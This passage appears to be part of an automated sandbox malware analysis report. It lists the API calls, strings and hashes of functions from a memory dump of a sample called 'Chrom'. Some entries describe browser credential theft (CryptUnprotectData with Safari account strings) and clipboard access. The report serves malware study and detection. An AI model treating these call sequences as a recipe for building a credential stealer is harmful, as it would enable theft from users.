                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3604893535-0
                                                                                                                                                        • Opcode ID: 44998ffc891bb225a56e9bb27206520a843834c4280dd8a38d2d5b5fef2c93d6
                                                                                                                                                        • Instruction ID: f2b573886a777ddc08947e4f1f5a0494481de075c88f5d4f6b384ba28402c1a7
                                                                                                                                                        • Opcode Fuzzy Hash: 44998ffc891bb225a56e9bb27206520a843834c4280dd8a38d2d5b5fef2c93d6
                                                                                                                                                        • Instruction Fuzzy Hash: C4112E7A904209FFEB105FA0EC4DA9F7BB8EB45351F104176F902E2292DB748D09CB68
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405400
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00405412
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405426
                                                                                                                                                        • #17.COMCTL32(?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405434
                                                                                                                                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00405451
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                        • API String ID: 2780580303-317687271
                                                                                                                                                        • Opcode ID: 5dfb1fab429fbac110f65632f4351b7de0d7d1b2a154ff3275be3e3fb28183c9
                                                                                                                                                        • Instruction ID: 02647c2cd5375a0cee16ec096afc735ec0ee25a180069e9de50cf8421b07617d
                                                                                                                                                        • Opcode Fuzzy Hash: 5dfb1fab429fbac110f65632f4351b7de0d7d1b2a154ff3275be3e3fb28183c9
                                                                                                                                                        • Instruction Fuzzy Hash: D801F4767516106BE7115BB4AC89BBB3A9CDF4674AB400035F502E6290EBBCDD098A6C
                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemTime.KERNEL32(?), ref: 0041A78D
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 0041A79C
                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0041A7AD
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 0041A7C0
                                                                                                                                                        • GetTickCount.KERNEL32 ref: 0041A7D4
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 0041A7E7
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0041A7FD
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000008), ref: 0041A80D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4218492932-0
                                                                                                                                                        • Opcode ID: e75bf55485dc5d7d8b1ce748ae8fe2053cdeb53d697cd784200e391488fbf47e
                                                                                                                                                        • Instruction ID: 2cc184040992abe9e4e17126ecdb49144539f0c36084feaac1bb63b25c18b641
                                                                                                                                                        • Opcode Fuzzy Hash: e75bf55485dc5d7d8b1ce748ae8fe2053cdeb53d697cd784200e391488fbf47e
                                                                                                                                                        • Instruction Fuzzy Hash: 6E11B9F3D0051867DB00EFA4DC49DDAB7ADEF4A210F464936FA15C7141E634E64887E5
                                                                                                                                                        APIs
                                                                                                                                                        • EmptyClipboard.USER32 ref: 00409E41
                                                                                                                                                        • wcslen.MSVCRT ref: 00409E4E
                                                                                                                                                        • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411571,-00000210), ref: 00409E5E
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00409E6B
                                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411571,-00000210), ref: 00409E74
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00409E7D
                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00409E86
                                                                                                                                                        • CloseClipboard.USER32 ref: 00409E96
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1213725291-0
                                                                                                                                                        • Opcode ID: 0164f3b3879468f6eceab2dbe93e6c2e0c32735ab1d54ab091d60a667f6ded84
                                                                                                                                                        • Instruction ID: ea904b1a76f59721029cddac23a3e6dc12fc942fabe90a21eef7b64a01167f20
                                                                                                                                                        • Opcode Fuzzy Hash: 0164f3b3879468f6eceab2dbe93e6c2e0c32735ab1d54ab091d60a667f6ded84
                                                                                                                                                        • Instruction Fuzzy Hash: 90F05B7B500228ABD2202FA5EC4DD5B776CDB86B9AB05013AF909D22529A245C0846B9
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A22E
                                                                                                                                                          • Part of subcall function 004192F2: GetVersionExW.KERNEL32(?), ref: 00419315
                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 0041A255
                                                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 0041A27E
                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0041A299
                                                                                                                                                        • free.MSVCRT ref: 0041A2C7
                                                                                                                                                          • Part of subcall function 0041938B: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,004194B6,?), ref: 004193A9
                                                                                                                                                          • Part of subcall function 0041938B: malloc.MSVCRT ref: 004193B0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                        • String ID: OsError 0x%x (%u)
                                                                                                                                                        • API String ID: 2360000266-2664311388
                                                                                                                                                        • Opcode ID: 66a5431910ad0f0ce767ad32103e4c3a3757044076d62f59ce7878390095469b
                                                                                                                                                        • Instruction ID: 09a38d3d336ad90078d9ee04c195a6b5e61967dcbffd067f140ccdfba9bcaacc
                                                                                                                                                        • Opcode Fuzzy Hash: 66a5431910ad0f0ce767ad32103e4c3a3757044076d62f59ce7878390095469b
                                                                                                                                                        • Instruction Fuzzy Hash: 1211C834901228BFDF11ABA1DC49CEF7F78EF45760B104067F805A2211D7750E95D7A9
                                                                                                                                                        APIs
                                                                                                                                                        • FindResourceW.KERNEL32(?,?,?), ref: 00416A53
                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00416A64
                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00416A74
                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00416A7F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3473537107-0
                                                                                                                                                        • Opcode ID: c89b420d8ff8532ca3e3af3ec0f8793a4f0b21527573ef5156956d1d610aacd0
                                                                                                                                                        • Instruction ID: 7a854b382b0c92d83852ff6be1e1e59c849c683da3176378bb1a11a70f524225
                                                                                                                                                        • Opcode Fuzzy Hash: c89b420d8ff8532ca3e3af3ec0f8793a4f0b21527573ef5156956d1d610aacd0
                                                                                                                                                        • Instruction Fuzzy Hash: D301D632600215ABCB158FA5DC4899BBF9EFF863A0709C03AFC45E6320DB30C984C6D8
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040A004: GetTempPathW.KERNEL32(00000104,?,?), ref: 0040A01B
                                                                                                                                                          • Part of subcall function 0040A004: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040A02D
                                                                                                                                                          • Part of subcall function 0040A004: GetTempFileNameW.KERNELBASE(?,004011DE,00000000,?), ref: 0040A044
                                                                                                                                                        • OpenClipboard.USER32(?), ref: 004113CB
                                                                                                                                                        • GetLastError.KERNEL32 ref: 004113E0
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 004113FF
                                                                                                                                                          • Part of subcall function 00409EA1: EmptyClipboard.USER32 ref: 00409EAB
                                                                                                                                                          • Part of subcall function 00409EA1: GetFileSize.KERNEL32(00000000,00000000), ref: 00409EC8
                                                                                                                                                          • Part of subcall function 00409EA1: GlobalAlloc.KERNEL32(00002000,00000002), ref: 00409ED9
                                                                                                                                                          • Part of subcall function 00409EA1: GlobalLock.KERNEL32(00000000), ref: 00409EE6
                                                                                                                                                          • Part of subcall function 00409EA1: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00409EF9
                                                                                                                                                          • Part of subcall function 00409EA1: GlobalUnlock.KERNEL32(00000000), ref: 00409F0B
                                                                                                                                                          • Part of subcall function 00409EA1: SetClipboardData.USER32(0000000D,00000000), ref: 00409F14
                                                                                                                                                          • Part of subcall function 00409EA1: CloseHandle.KERNEL32(?), ref: 00409F28
                                                                                                                                                          • Part of subcall function 00409EA1: CloseClipboard.USER32 ref: 00409F3C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2633007058-0
                                                                                                                                                        • Opcode ID: 20d099faa1af22661b39900e4eb9d3841db7e32abb08b7b598010ec37cab23bc
                                                                                                                                                        • Instruction ID: 67aa2ef175f2399da1d40db2a93dbf2ce4f101bde76a1b907a1a325d03d0d586
                                                                                                                                                        • Opcode Fuzzy Hash: 20d099faa1af22661b39900e4eb9d3841db7e32abb08b7b598010ec37cab23bc
                                                                                                                                                        • Instruction Fuzzy Hash: B3F0F43530030496EB202B72DC4EFDB365DCB80711F00003ABA62961E2EE79EC858568
                                                                                                                                                        APIs
                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00419315
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Version
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                                        • Opcode ID: 7326f150f62c8e493511fbb22f4dc93557bb1aa2f813e00d2fd5eebd9c0dcf9c
                                                                                                                                                        • Instruction ID: 31f7a407b4742d582560ea033e5ca5f76b9ceb554be12180941efba1faa7fce5
                                                                                                                                                        • Opcode Fuzzy Hash: 7326f150f62c8e493511fbb22f4dc93557bb1aa2f813e00d2fd5eebd9c0dcf9c
                                                                                                                                                        • Instruction Fuzzy Hash: 64E0B67591131CCFEB28DB35DB4B3C67AE4A718B46F4004B5C21AD2192D2789A88CA67
                                                                                                                                                        APIs
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004029B7
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004029E8
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00402A16
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00402A44
                                                                                                                                                          • Part of subcall function 0040B04F: wcslen.MSVCRT ref: 0040B062
                                                                                                                                                          • Part of subcall function 0040B04F: memcpy.MSVCRT(?,?,00000000,00000000,0040D237,00000000,?,?), ref: 0040B081
                                                                                                                                                        • memset.MSVCRT ref: 00402D70
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000011), ref: 00402DAC
                                                                                                                                                          • Part of subcall function 00407687: GetProcAddress.KERNEL32(0045EC00,00000000), ref: 004076B7
                                                                                                                                                          • Part of subcall function 00407687: FreeLibrary.KERNEL32(00000000,00000141,?,-000000FB,?,004016C4,?,00000000,00000000,?), ref: 004076DA
                                                                                                                                                          • Part of subcall function 00407687: CryptUnprotectData.CRYPT32(-000000FB,00000000,-000000FB,00000000,00000000,-000000FB,-000000FB), ref: 004076FC
                                                                                                                                                        • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 00402E10
                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402E75
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402E86
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                        • API String ID: 2929817778-1134094380
                                                                                                                                                        • Opcode ID: 995f29d439b71307d32f83be2d0feb689db9085f2827bd8da7cec9ab0f4b1b5b
                                                                                                                                                        • Instruction ID: 5c3ec6a99a68f8aa81af4276027bb9dc61f0416e6f69787378e7b5f4b2d81055
                                                                                                                                                        • Opcode Fuzzy Hash: 995f29d439b71307d32f83be2d0feb689db9085f2827bd8da7cec9ab0f4b1b5b
                                                                                                                                                        • Instruction Fuzzy Hash: 07E1E56100C7C18DD332D678884978BBFD45BA7328F084B9EF1E85A2D2D7B99509C76B
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                        • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                        • API String ID: 2787044678-1921111777
                                                                                                                                                        • Opcode ID: ec0114e663ce19aff3f90003a8fd63b11b9c22cd63c360598622bef034e99d4e
                                                                                                                                                        • Instruction ID: 31c4756266147e6910c9b81443fc6bcc098cf3ae963dfb44ea8ac31e231b8895
                                                                                                                                                        • Opcode Fuzzy Hash: ec0114e663ce19aff3f90003a8fd63b11b9c22cd63c360598622bef034e99d4e
                                                                                                                                                        • Instruction Fuzzy Hash: E591C571900209AEEF10EF65CC85EAF776CEF41308F11017AFD48A7181EA39ED559BA9
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00415A7C
                                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00415A88
                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00415A97
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00415AA3
                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00415AAC
                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00415AB8
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00415ACA
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00415AD5
                                                                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00415AE9
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00415AF7
• GetDC.USER32 ref: 00415B30
• wcslen.MSVCRT ref: 00415B70
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00415B81
• ReleaseDC.USER32(?,?), ref: 00415BCE
• _snwprintf.MSVCRT ref: 00415C91
• SetWindowTextW.USER32(?,?), ref: 00415CA5
• SetWindowTextW.USER32(?,00000000), ref: 00415CC3
• GetDlgItem.USER32(?,00000001), ref: 00415CF9
• GetWindowRect.USER32(00000000,?), ref: 00415D09
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00415D17
• GetClientRect.USER32(?,?), ref: 00415D2E
• GetWindowRect.USER32(?,?), ref: 00415D38
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00415D7E
• GetClientRect.USER32(?,?), ref: 00415D88
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00415DC0
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
• Opcode ID: 73acb0ed32a970b20df8983533c2da65e35bdd152e1489d9eefe2103cdb0831a
• Instruction ID: 2a77a63511e309727bf0294579c2b04fd4d2a03fba58f863ebfb764bbd101497
• Opcode Fuzzy Hash: 73acb0ed32a970b20df8983533c2da65e35bdd152e1489d9eefe2103cdb0831a
• Instruction Fuzzy Hash: ACB1C075108301AFD721DFA8C985E6BBBF9FF88704F004A2DF59582261DB75E9088F56
APIs
  • Part of subcall function 00410381: memset.MSVCRT ref: 004103C4
  • Part of subcall function 00410381: memset.MSVCRT ref: 004103D9
  • Part of subcall function 00410381: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004103EB
  • Part of subcall function 00410381: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00410409
  • Part of subcall function 00410381: SendMessageW.USER32(?,00001003,00000001,?), ref: 00410446
  • Part of subcall function 00410381: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0041045A
  • Part of subcall function 00410381: ImageList_SetImageCount.COMCTL32(00000000,0000000A), ref: 00410465
  • Part of subcall function 00410381: SendMessageW.USER32(?,00001003,00000000,?), ref: 0041047D
  • Part of subcall function 00410381: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00410489
  • Part of subcall function 00410381: GetModuleHandleW.KERNEL32(00000000), ref: 00410498
  • Part of subcall function 00410381: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 004104AA
  • Part of subcall function 00410381: GetModuleHandleW.KERNEL32(00000000), ref: 004104B5
  • Part of subcall function 00410381: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 004104C7
  • Part of subcall function 00410381: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004104D8
  • Part of subcall function 00410381: GetSysColor.USER32(0000000F), ref: 004104E0
• GetModuleHandleW.KERNEL32(00000000), ref: 00403F95
• LoadIconW.USER32(00000000,00000072), ref: 00403FA0
• ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403FB1
• GetModuleHandleW.KERNEL32(00000000), ref: 00403FB5
• LoadIconW.USER32(00000000,00000074), ref: 00403FBA
• ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00403FC5
• GetModuleHandleW.KERNEL32(00000000), ref: 00403FC9
• LoadIconW.USER32(00000000,00000073), ref: 00403FCE
• ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 00403FD9
• GetModuleHandleW.KERNEL32(00000000), ref: 00403FDD
• LoadIconW.USER32(00000000,00000075), ref: 00403FE2
• ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 00403FED
• GetModuleHandleW.KERNEL32(00000000), ref: 00403FF1
• LoadIconW.USER32(00000000,0000006F), ref: 00403FF6
• ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 00404001
• GetModuleHandleW.KERNEL32(00000000), ref: 00404005
• LoadIconW.USER32(00000000,00000076), ref: 0040400A
• ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 00404015
• GetModuleHandleW.KERNEL32(00000000), ref: 00404019
• LoadIconW.USER32(00000000,00000077), ref: 0040401E
• ImageList_ReplaceIcon.COMCTL32(?,00000006,00000000), ref: 00404029
• GetModuleHandleW.KERNEL32(00000000), ref: 0040402D
• LoadIconW.USER32(00000000,00000070), ref: 00404032
• ImageList_ReplaceIcon.COMCTL32(?,00000007,00000000), ref: 0040403D
• GetModuleHandleW.KERNEL32(00000000), ref: 00404041
• LoadIconW.USER32(00000000,00000078), ref: 00404046
• ImageList_ReplaceIcon.COMCTL32(?,00000008,00000000), ref: 00404051
